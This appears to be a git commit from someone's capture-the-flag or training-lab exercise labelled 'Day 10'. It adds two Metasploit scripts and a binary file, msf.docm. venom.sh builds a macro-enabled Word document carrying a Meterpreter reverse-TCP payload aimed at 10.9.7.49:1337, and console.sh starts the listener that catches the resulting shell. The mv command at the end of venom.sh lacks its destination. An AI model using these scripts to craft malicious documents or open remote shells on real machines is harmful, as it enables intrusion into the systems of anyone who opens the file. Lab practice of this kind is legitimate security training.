Add files for Day 10: He had a brain full of macros, and had shells in his soul.

This commit is contained in:
Sivert V. Sæther 2024-12-13 14:34:26 +01:00
parent 2fbdc476ce
commit 3ec60f2a7e
3 changed files with 18 additions and 0 deletions

8
10/console.sh Executable file
View File

@ -0,0 +1,8 @@
msfconsole <<EOF
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.9.7.49
set LPORT 1337
#show options
exploit
EOF

BIN
10/msf.docm Normal file

Binary file not shown.

10
10/venom.sh Executable file
View File

@ -0,0 +1,10 @@
msfconsole <<EOF
set payload windows/meterpreter/reverse_tcp
use exploit/multi/fileformat/office_word_macro
set LHOST 10.9.7.49
set LPORT 1337
#show options
exploit
exit
EOF
mv /home/siv/.msf4/local/msf.docm